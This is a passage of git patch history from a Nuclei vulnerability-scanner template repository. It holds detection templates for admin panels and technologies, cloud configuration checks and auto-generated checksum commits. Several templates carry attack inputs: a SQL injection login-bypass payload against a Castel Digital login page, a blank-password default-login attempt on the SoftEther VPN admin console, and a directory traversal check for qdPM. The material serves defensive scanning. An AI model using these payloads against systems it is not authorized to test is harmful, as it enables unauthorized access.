username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x + + matchers-condition: and + matchers: + - type: word + words: + - "Sistema Web para Imobiliárias e Corretores" + - "Área Restrita" + condition: and + - type: status + status: + - 200 \ No newline at end of file From 721003c0c5e8fadb0343edb66cdca207cc57f0f6 Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson <bhutch@gmail.com> Date: Mon, 13 May 2024 14:40:37 +0000 Subject: [PATCH 0901/1768] Create softether-vpn-default-login.yaml --- .../softether-vpn-default-login.yaml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/default-logins/softether-vpn-default-login.yaml diff --git a/http/default-logins/softether-vpn-default-login.yaml b/http/default-logins/softether-vpn-default-login.yaml new file mode 100644 index 0000000000..ccab0eea4e --- /dev/null +++ b/http/default-logins/softether-vpn-default-login.yaml @@ -0,0 +1,39 @@ +id: softether-vpn-default-login + +info: + name: SoftEther VPN Admin Console - Default Login + author: bhutch + severity: high + description: | + The administrative password for the SoftEther VPN Server is blank. + reference: + - https://www.softether.org/4-docs/1-manual/3._SoftEther_VPN_Server_Manual/3.3_VPN_Server_Administration#Administration_Authority_for_the_Entire_SoftEther_VPN_Server + metadata: + shodan-query: title:"SoftEther VPN Server" + verified: true + tags: panel,vpn,softether,default-login + +http: + - raw: + - | + GET /admin/default/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + attack: pitchfork + payloads: + username: + - administrator + password: + - + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>SoftEther VPN Server HTML5 Web Administration Console (Under construction!)' + + - type: status + status: + - 200 From 30af5445c0ff2fa70b836a421027b4e3cfb80bf6 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Mon, 13 May 2024 18:15:09 +0330 Subject: [PATCH 0902/1768] Add ghost-panel.yaml --- http/exposed-panels/ghost-panel.yaml | 30 ++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/exposed-panels/ghost-panel.yaml diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml new file mode 100644 index 0000000000..8252a0cefa --- /dev/null +++ b/http/exposed-panels/ghost-panel.yaml @@ -0,0 +1,30 @@ +id: ghost-panel + +info: + name: Ghost Panel - Detect + author: userdehghani + severity: info + description: | + beautiful, modern publishing with email newsletters and paid subscriptions built-in. + reference: + - https://ghost.org/ + metadata: + verified: true + max-request: 1 + tags: panel,ghost,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/ghost/#/signin" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'Ghost Admin' + - 'content="Ghost"' + condition: or + case-insensitive: true \ No newline at end of file From 8aacc67f40047340890e9f50b0a79fc623fb3f2f Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <m.a.dehghani609@gmail.com> Date: Mon, 13 May 2024 18:17:52 +0330 Subject: [PATCH 0903/1768] Update ghost-panel.yaml --- http/exposed-panels/ghost-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml index 8252a0cefa..b565dcdc54 100644 --- a/http/exposed-panels/ghost-panel.yaml +++ b/http/exposed-panels/ghost-panel.yaml @@ -27,4 +27,4 @@ http: - '<title>Ghost Admin' - 'content="Ghost"' condition: or - case-insensitive: true \ No newline at end of file + case-insensitive: true From 2a7ac6eb8a79c90d9757fd3983a7a1f1555071f3 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Mon, 13 May 2024 17:49:02 +0300 Subject: [PATCH 0904/1768] fix matcher --- http/vulnerabilities/other/castel-digital-sqli.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml index f171d74341..c4438fae6b 100644 --- a/http/vulnerabilities/other/castel-digital-sqli.yaml +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -16,18 +16,23 @@ info: http: - raw: - | - POST /restrito/login HTTP/1.1 + POST /restrito/login/sub/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x + + - | + GET /restrito/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word words: - - "Sistema Web para Imobiliárias e Corretores" - - "Área Restrita" + - "Banner" + - "Construtoras" condition: and - type: status status: From 1573ed198195d6becd5c0f3a602d127af4b570cc Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <m.a.dehghani609@gmail.com> Date: Mon, 13 May 2024 18:34:11 +0330 Subject: [PATCH 0905/1768] Update meilisearch-detec.yaml --- http/technologies/meilisearch-detec.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/technologies/meilisearch-detec.yaml b/http/technologies/meilisearch-detec.yaml index 66d5261606..a2b8b18d5a 100644 --- a/http/technologies/meilisearch-detec.yaml +++ b/http/technologies/meilisearch-detec.yaml @@ -22,8 +22,7 @@ http: matchers: - type: dsl dsl: - - 'status_code == 200' - - 'contains(content_type, "application/json")' + - 'status_code == 200 && contains(content_type, "application/json")' - type: word part: body From ca34c02f1ac8db1cceda9d675c2e5ecbab73be5a Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 18:39:28 +0330 Subject: [PATCH 0906/1768] Add imgproxy-detect.yaml --- http/technologies/imgproxy-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 http/technologies/imgproxy-detect.yaml diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml new file mode 100644 index 0000000000..ba654a8528 --- /dev/null +++ b/http/technologies/imgproxy-detect.yaml @@ -0,0 +1,24 @@ +id: imgproxy-detect + +info: + name: Imgproxy Detect + author: userdehghani + severity: info + description: | + imgproxy is a fast and secure standalone server for resizing, processing, and converting images. + reference: + - https://imgproxy.net/ + metadata: + verified: true + max-request: 1 + tags: imgproxy,tech,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200 && contains(server, "imgproxy")' From d4ec104bbc5a78fd05f19efd0f4a56302a99bfe4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Mon, 13 May 2024 21:00:13 +0530 Subject: [PATCH 0907/1768] Update cloudtrail-logs-not-encrypted.yaml --- cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index 4fc82d8c28..b2cd122a10 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -14,13 +14,13 @@ info: tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config variables: - region: "ap-south-1" + region: "us-east-1" flow: | code(1) for(let CloudTrail of iterate(template.cloudtrailname)){ set("trail", CloudTrail) - set("region", CloudTrail.trailregion) + set("region", template.trailregion) code(2) } @@ -60,4 +60,3 @@ code: - type: dsl dsl: - '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"' -# digest: 490a004630440220615ff60f92dc1540ae499c543e657c18d430e7b6b08291befb395d465b0dfa280220748efe3b2771beb250f0c50040e94c8c0a9a37f60fcb6c88bbe9ff55b5362fa1:922c64590222798bb761d5b6d8e72950 From adff13fd67d560dd9ec5189dcceecca46a1cb97d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 13 May 2024 21:00:13 +0530 Subject: [PATCH 0908/1768] Update uni-gui-framework-detection.yaml --- uni-gui-framework-detection.yaml | 41 ++++++++++++++++++++------------ 1 file changed, 26 insertions(+), 15 deletions(-) diff --git a/uni-gui-framework-detection.yaml b/uni-gui-framework-detection.yaml index af1c00c6e3..e40a8a012f 100644 --- a/uni-gui-framework-detection.yaml +++ b/uni-gui-framework-detection.yaml @@ -1,39 +1,50 @@ -id: uni-gui-framework-detection +id: uni-gui-framework -info: - name: Detect UniGUI Framework and Version - author: serrapa - severity: info - description: Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. - -requests: +info: + name: UniGUI Framework - Detect + author: serrapa + severity: info + description: | + Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"UniGUI" + tags: tech,unigui + +http: - method: GET path: - "{{BaseURL}}/" + host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - type: word + part: body words: - "uni-xtheme-" - "ext-all.js" - "uniVars._extVer=" condition: or - part: body + - type: regex + part: body regex: - 'uni-(\d+\.\d+\.\d+\.\d+)/' - 'uniVars._extVer="(\d+\.\d+\.\d+)"' - part: body + extractors: - type: regex - regex: - - 'uni-(\d+\.\d+\.\d+\.\d+)/' part: body name: uni_gui_version - - type: regex regex: - - 'uniVars._extVer="(\d+\.\d+\.\d+)"' + - 'uni-(\d+\.\d+\.\d+\.\d+)' + + - type: regex part: body name: ext_js_version - + regex: + - 'uniVars._extVer="(\d+\.\d+\.\d+)"' From 132653dc83fff08bc813192e7866411ac9ead6d9 Mon Sep 17 00:00:00 2001 From: Mohammad D <m.a.dehghani609@gmail.com> Date: Mon, 13 May 2024 19:24:30 +0330 Subject: [PATCH 0909/1768] Update and rename meilisearch-detec.yaml to meilisearch-detect.yaml --- .../{meilisearch-detec.yaml => meilisearch-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/technologies/{meilisearch-detec.yaml => meilisearch-detect.yaml} (100%) diff --git a/http/technologies/meilisearch-detec.yaml b/http/technologies/meilisearch-detect.yaml similarity index 100% rename from http/technologies/meilisearch-detec.yaml rename to http/technologies/meilisearch-detect.yaml From 5ac2a9916133b6a6a330022750f98e7442230685 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 23:10:16 +0530 Subject: [PATCH 0910/1768] Update and rename uni-gui-framework-detection.yaml to http/technologies/uni-gui-framework.yaml --- .../technologies/uni-gui-framework.yaml | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) rename uni-gui-framework-detection.yaml => http/technologies/uni-gui-framework.yaml (69%) diff --git a/uni-gui-framework-detection.yaml b/http/technologies/uni-gui-framework.yaml similarity index 69% rename from uni-gui-framework-detection.yaml rename to http/technologies/uni-gui-framework.yaml index e40a8a012f..5f9d6f5c1d 100644 --- a/uni-gui-framework-detection.yaml +++ b/http/technologies/uni-gui-framework.yaml @@ -37,14 +37,14 @@ http: - 'uniVars._extVer="(\d+\.\d+\.\d+)"' extractors: - - type: regex - part: body - name: uni_gui_version - regex: - - 'uni-(\d+\.\d+\.\d+\.\d+)' + - type: regex + part: body + name: uni_gui_version + regex: + - 'uni-(\d+\.\d+\.\d+\.\d+)' - - type: regex - part: body - name: ext_js_version - regex: - - 'uniVars._extVer="(\d+\.\d+\.\d+)"' + - type: regex + part: body + name: ext_js_version + regex: + - 'uniVars._extVer="(\d+\.\d+\.\d+)"' From 6a7c37fbad312c4e0fedb47a852775013acb67e6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 23:12:07 +0530 Subject: [PATCH 0911/1768] remove / --- http/technologies/uni-gui-framework.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/uni-gui-framework.yaml b/http/technologies/uni-gui-framework.yaml index 5f9d6f5c1d..a0654b54b3 100644 --- a/http/technologies/uni-gui-framework.yaml +++ b/http/technologies/uni-gui-framework.yaml @@ -15,7 +15,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" host-redirects: true max-redirects: 2 From 00c9169fd001536a083f7c248df0948cbd343e4c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 17:46:41 +0000 Subject: [PATCH 0913/1768] Auto Generated New Template Addition List [Mon May 13 17:46:41 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 10db97c58d..1f3f2103a8 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/matomo-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml @@ -14,4 +15,5 @@ http/technologies/apache/apache-answer-detect.yaml http/technologies/craftercms-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml +http/technologies/uni-gui-framework.yaml http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml From 7022cc8e3003ffbf7d95e9efe390e3355cc2b6f0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 17:46:49 +0000 Subject: [PATCH 0914/1768] Auto Generated Templates Checksum [Mon May 13 17:46:49 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 910422913e..b9143dcb97 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -210,7 +210,7 @@ dast/vulnerabilities/ssti/reflection-ssti.yaml:f88426f514ecbe514a5b988b2e826d967 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:1faff32e9ad4bb73f0476c526f9b6ef6d5a51757 dast/vulnerabilities/xxe/generic-xxe.yaml:54b04c0c3b8d50d6305ed48ac7997f1aeeea426d -dns/azure-takeover-detection.yaml:aa7033fb366a4fb11dc5b575f20908007cda26f2 +dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a dns/bimi-detect.yaml:49b1f8b7289261ba3926483a41fa213f921248f2 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -4030,7 +4030,7 @@ http/exposed-panels/mailhog-panel.yaml:086f46cbe44037b7a0e98e2de15e3b244478c498 http/exposed-panels/mailwatch-login.yaml:5806b40c7aba9a02c1df2d3984844a3d0fbda20c http/exposed-panels/maltrail-panel.yaml:e64bf45e9330011747c012809705e894700e308b http/exposed-panels/mantisbt-panel.yaml:a79ef369723d43f4d20f4d94abe7bbabec3afa04 -http/exposed-panels/matomo-panel.yaml:83b26c8dc76d00f712f199f43099c80dcad3d208 +http/exposed-panels/matomo-panel.yaml:8e36acccca8cb5c975d38a314c941c22a2204faf http/exposed-panels/mautic-crm-panel.yaml:53a7b87d599c64c95672e30524f3c8bfe053160d http/exposed-panels/memos-panel.yaml:889e1696bded69cb5833dc1cd22b44ac49318773 http/exposed-panels/meshcentral-login.yaml:6112dd7a01bf42c06b47b029f3aafb08d85f7ee0 @@ -6939,6 +6939,7 @@ http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 +http/technologies/uni-gui-framework.yaml:9f59eba6c4872958ade6e9f88eb08273d11708bc http/technologies/utility-service-detect.yaml:c6754cc4daf389f30429c27e153462cc4b5f65a4 http/technologies/vbulletin-detect.yaml:a48f02b03dc57037391b6c02e06f20906b9d9015 http/technologies/versa/versa-analytics-server.yaml:ab6b798c55d8379b64cd1bc97b70ee6377f151e5 @@ -8516,7 +8517,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:11807a89775af584dc3410d74f2576e8276bde19 +templates-checksum.txt:6666fc76c5385448f1e5ec6b44a709d427a1c2d7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7d4cf05051ff12118e2c930ab1bbb798a5ffa6c6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 17:47:22 +0000 Subject: [PATCH 0915/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ad1014d6de..d171f57fa8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' @@ -19,6 +20,7 @@ on: - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' + - 'http/technologies/uni-gui-framework.yaml' - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' workflow_dispatch: jobs: From 4f5634538fa31593534cda800bed51a9c08b43fb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 17:48:30 +0000 Subject: [PATCH 0916/1768] Auto Template Signing [Mon May 13 17:48:30 UTC 2024] :robot: --- http/technologies/uni-gui-framework.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/uni-gui-framework.yaml b/http/technologies/uni-gui-framework.yaml index a0654b54b3..b004c0dc86 100644 --- a/http/technologies/uni-gui-framework.yaml +++ b/http/technologies/uni-gui-framework.yaml @@ -48,3 +48,4 @@ http: name: ext_js_version regex: - 'uniVars._extVer="(\d+\.\d+\.\d+)"' +# digest: 490a0046304402206a748c936bf19bbd442ca7a03f7e7b4d7947a2a385b1b49e7f308d20a043cf5f022016ae7660962c0a4e9421084b61ff85f7490145cb44206622d7a369d80751e1ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 681dff2a5242d16fdc2ccbc10a9e51eecb4e69fa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 17:49:15 +0000 Subject: [PATCH 0918/1768] Auto Generated Templates Checksum [Mon May 13 17:49:15 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b9143dcb97..fca54f8306 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -19,7 +19,7 @@ cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:71aafc94886bc0bf1ad799a59043ccb14c cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:0fdecbb14773ede92defb5550f8b6f280675ae77 cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:4e6f15779999587b4ebbcf8b0ddc523155decb48 cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:2493c4d57eef3d147cf93ffd7a492cfc409f1426 -cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:8c6cf3eeb8314189731e7c5925fb8f3b9057f278 +cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:de816d2b05c12627ccb40a388ecf0663767b76ac cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:ca1a07dc81a0071d64ab7a4d9868367d1c7465ea cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:c5c333bcd31a6282a913a9cfe7a440566ed1bb78 cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:4fd566c83837e16dbc3b4db04b840b0abcba2804 @@ -6939,7 +6939,7 @@ http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 -http/technologies/uni-gui-framework.yaml:9f59eba6c4872958ade6e9f88eb08273d11708bc +http/technologies/uni-gui-framework.yaml:24da39f35b8c52b287e5c62359c6bdfffafc32a2 http/technologies/utility-service-detect.yaml:c6754cc4daf389f30429c27e153462cc4b5f65a4 http/technologies/vbulletin-detect.yaml:a48f02b03dc57037391b6c02e06f20906b9d9015 http/technologies/versa/versa-analytics-server.yaml:ab6b798c55d8379b64cd1bc97b70ee6377f151e5 @@ -8517,7 +8517,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6666fc76c5385448f1e5ec6b44a709d427a1c2d7 +templates-checksum.txt:4950e75d142c90a986cb044a223fd568225adc38 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 42cfb21d39fa9b83c70635e720976f98d79b7e12 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 17:51:00 +0000 Subject: [PATCH 0919/1768] Auto Template Signing [Mon May 13 17:51:00 UTC 2024] :robot: --- cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index b2cd122a10..84ca11eca2 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -60,3 +60,4 @@ code: - type: dsl dsl: - '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"' +# digest: 4b0a00483046022100b39586900f3cb7a7ce2582be709c7b3d1b25bceaf0f6d35887c3a3d62bfff8d80221009aa3a72ddade09b522655349a54b6cb7e6e0ebd3b36d85b30899b283e77dc90d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c409580ea800f6c742d43b0eb1fdd491244e95d4 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Mon, 13 May 2024 20:14:44 +0200 Subject: [PATCH 0920/1768] Add files via upload --- http/exposed-panels/easyvista-panel.yaml | 35 ++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposed-panels/easyvista-panel.yaml diff --git a/http/exposed-panels/easyvista-panel.yaml b/http/exposed-panels/easyvista-panel.yaml new file mode 100644 index 0000000000..d21e0aea11 --- /dev/null +++ b/http/exposed-panels/easyvista-panel.yaml @@ -0,0 +1,35 @@ +id: easyvista-panel + +info: + name: EasyVista Login Panel - Detect + author: righettod + severity: info + description: | + EasyVista login panel was detected. + reference: + - https://www.easyvista.com/ + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"Easyvista" + tags: panel,easyvista,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/index.php" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>easyvista apps", "easyvista-bundle.min.js", "packages_com_easyvista_core")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)package:\s+"([a-z0-9._-]+)"' + - '(?i)version : ([a-z0-9._-]+)' \ No newline at end of file From 180bde320888216e39c9ea55b1f11d7ac931754a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 14 May 2024 02:26:35 +0530 Subject: [PATCH 0921/1768] Update warp-malware.yaml --- file/malware/warp-malware.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/malware/warp-malware.yaml b/file/malware/warp-malware.yaml index bcf2e9b53a..117474c917 100644 --- a/file/malware/warp-malware.yaml +++ b/file/malware/warp-malware.yaml @@ -18,7 +18,7 @@ file: - "/2011/n325423.shtml?" - "wyle" - "\\~ISUN32.EXE" - condition: or + condition: and - type: binary binary: From f2caf227f37a9dcc4387a8203d7231377654614c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 09:16:22 +0530 Subject: [PATCH 0922/1768] updated matcher & info --- http/cves/2023/CVE-2023-45855.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index d3c814f700..db33f12afc 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -1,16 +1,18 @@ id: CVE-2023-45855 info: - name: qdPM 9.2 Directory Traversal Vulnerability + name: qdPM 9.2 - Directory Traversal author: DhiyaneshDk severity: high - description: qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI. + description: | + qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI. impact: | Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade qdPM to a non-vulnerable version to mitigate the directory traversal vulnerability. reference: - - https://qdpm.net + - https://github.com/SunshineOtaku/Report-CVE/blob/main/qdPM/9.2/Directory%20Traversal.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-45855 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -23,7 +25,7 @@ info: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 - tags: cve,cve2023,qdpm,lfi,listing + tags: cve,cve2023,qdpm,lfi http: - method: GET @@ -35,8 +37,8 @@ http: - type: word part: body words: - - "users" - - "attachments" + - "Index of /uploads" + - "attachments/" condition: and - type: status From 40d9924bffdc67e06b3b9e4e77bbc2b1cb7bcba9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 03:57:58 +0000 Subject: [PATCH 0923/1768] Auto Generated New Template Addition List [Tue May 14 03:57:58 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1f3f2103a8..c2172fbbf9 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml +http/cves/2023/CVE-2023-45855.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml From 9c3bedf6159113603251d5a103969b525c638b05 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 03:58:07 +0000 Subject: [PATCH 0924/1768] Auto Generated Templates Checksum [Tue May 14 03:58:07 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fca54f8306..14b52594f4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -19,7 +19,7 @@ cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:71aafc94886bc0bf1ad799a59043ccb14c cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:0fdecbb14773ede92defb5550f8b6f280675ae77 cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:4e6f15779999587b4ebbcf8b0ddc523155decb48 cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:2493c4d57eef3d147cf93ffd7a492cfc409f1426 -cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:de816d2b05c12627ccb40a388ecf0663767b76ac +cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:4f082a6a5aed38fdbf01a3194fbaffc4cd799a8a cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:ca1a07dc81a0071d64ab7a4d9868367d1c7465ea cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:c5c333bcd31a6282a913a9cfe7a440566ed1bb78 cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:4fd566c83837e16dbc3b4db04b840b0abcba2804 